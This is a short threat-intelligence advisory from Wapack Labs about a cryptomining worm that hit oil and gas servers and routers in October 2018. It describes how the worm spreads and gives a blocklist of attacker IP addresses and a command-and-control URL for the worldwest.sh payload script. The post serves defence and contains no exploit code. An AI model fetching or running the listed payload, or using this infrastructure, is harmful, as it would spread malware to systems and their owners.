Security Intelligence

Wapack Labs SOC observed a new cryptominer worm attacking Oil and Gas industry targets in an automated/opportunistic event.  Two separate series of exploitation attempts happened on 02 and 05 October 2018.

Figure 1. 185.232.64.161 trying to run 185.10.68.163/worldwest.sh 

An unidentified actor was attempting to exploit Internet facing servers and oil and gas VIP home routers from two Romanian based IP addresses.  In an opportunistic event, the actor(s) were attempting to exploit any device running Java XML or Jenkins, as well as Dell Sonicwalls, MVPower DVRs, D-Link DSL2750B routers and Netgear DGN1000 Series routers.  Inspection of the packet revealed all the exploits referred to a common IP address, which appeared to be the command and control source and a shell script named “worldwest.sh”.  Opensource research on the shell script provided a research paper published by Juniper Networks on 27 September 2018 describing a new cryptomining worm using this script.  The worm first compromises the victim using any of the above exploits, then runs the WorldWest shell script.  That script then downloads and installs two other shell scripts; a Monero cryptocurrency miner, and a network scanner.  While the victim mines Monero, it also scans the network for other targets, and attempts to infect other devices using both brute force SSH attempts and the exploit kit.  An indicator CSV file is available to prepare a blacklist.

Indicators

Indicator

Type

Kill_Chain_Phase

First_Seen

Last_Seen

Comments

Attribution

185.232.64.32

IP

Exploitation

10/05/2018

10/05/2018

Recommend block

WorldWest

185.232.64.161

IP

Exploitation

10/02/2018

10/02/2018

Recommend block

WorldWest

185.10.68.163

IP

C2

9/19/2018

10/05/2018

Recommend block

WorldWest

http://185.10.68.163/worldwest.sh

URL

Exploitation

9/19/2018

10/05/2018

Recommend block

WorldWest

worldwest.sh

File

Exploitation

9/19/2018

10/05/2018

Recommend block

WorldWest

You need to be a member of Red Sky Alliance to add comments!

Join Red Sky Alliance

Email me when people reply –